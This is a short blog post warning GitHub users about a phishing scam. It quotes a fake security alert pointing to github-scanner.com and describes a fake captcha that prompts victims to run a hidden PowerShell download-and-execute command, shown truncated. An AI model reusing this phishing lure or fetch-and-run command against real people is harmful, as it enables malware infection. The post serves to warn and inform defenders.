Avoid github-scanner.com scam!

Crooks sent the fake security alerts to the GitHub repository owners:

Hey there!

We have detected a security vulnerability in your repository. Please contact us at hxxps://github-scanner.com to get more information on how to fix this issue.

Best regards,
Github Security Team"

Avoid github-scanner-com scam You will see the fake captcha screen if you open the scam site.

Fake captcha

The click on the captcha will prompt you to run open up Windows Run: powershell.exe -w hidden -Command "iex (iwr '...

github-scanner-com Powershell command

Virustotal results for downloaded executable: 47/73!

Virustotal result for github-scanner-com-executable

Verdict:

Be careful even if a trusted company sends the message! The crooks use the GitHub features to send their messages.
Posted on by Dmitry

Read More

Got Something To Say?

Your email address will not be published.